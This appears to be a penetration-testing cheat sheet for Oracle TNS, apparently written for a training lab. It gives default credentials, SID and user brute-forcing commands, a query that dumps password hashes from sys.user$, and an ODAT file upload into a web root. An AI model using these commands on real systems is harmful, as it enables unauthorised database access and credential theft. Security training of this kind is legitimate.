# Oracle TNS The TNS listener is configured to support various network protocols, including `TCP/IP`, `UDP`, `IPX/SPX`, and `AppleTalk` The configuration files for Oracle TNS are called `tnsnames.ora` and `listener.ora` and are typically located in the `$ORACLE_HOME/network/admin` directory Oracle 9 has a default password, `CHANGE_ON_INSTALL`, whereas Oracle 10 has no default password set Oracle DBSNMP service also uses a default password, `dbsnmp` Each database or service has a unique entry in the [tnsnames.ora](https://docs.oracle.com/cd/E11882_01/network.112/e10835/tnsnames.htm#NETRF007) file In Oracle RDBMS, a System Identifier (`SID`) is a unique name that identifies a particular database instance The SIDs are an essential part of the connection process, as it identifies the specific instance of the database the client wants to connect to. There are various ways to enumerate, or better said, guess SIDs. Therefore we can use tools like `nmap`, `hydra`, `odat`, and others. ## Tools ```bash ./odat.py -h ``` If not installed, see [pentesting-machine](https://docs.rtlcopymemory.com/pentesting-machine "mention") ## **Nmap - SID Bruteforcing** ```bash sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute ``` ## ODAT - More information, user bruteforcing included ```shell-session ./odat.py all -s 10.129.204.235 ``` ## **SQLplus - Log In** ```shell-session sqlplus /@/ ``` {% hint style="info" %} In case of error `sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory` execute: `sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig` {% endhint %} [SQLplus commands](https://docs.oracle.com/cd/E11882_01/server.112/e41085/sqlqraa001.htm#SQLQR985): ```shell-session select table_name from all_tables; ``` ```shell-session select * from user_role_privs; ``` ## Database Enumeration possible to try known credentials to use the System Databse Admin `sysdba`: ```shell-session sqlplus scott/tiger@10.129.204.235/XE as sysdba ``` Then list current user privs: ```shell-session select * from user_role_privs; ``` From this point, we could retrieve the password hashes from the `sys.user$` and try to crack them offline: ```shell-session select name, password from sys.user$; ``` ## **Oracle RDBMS - File Upload** ```bash echo "Oracle File Upload Test" > testing.txt ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt ``` ```bash curl -X GET http://10.129.204.235/testing.txt ```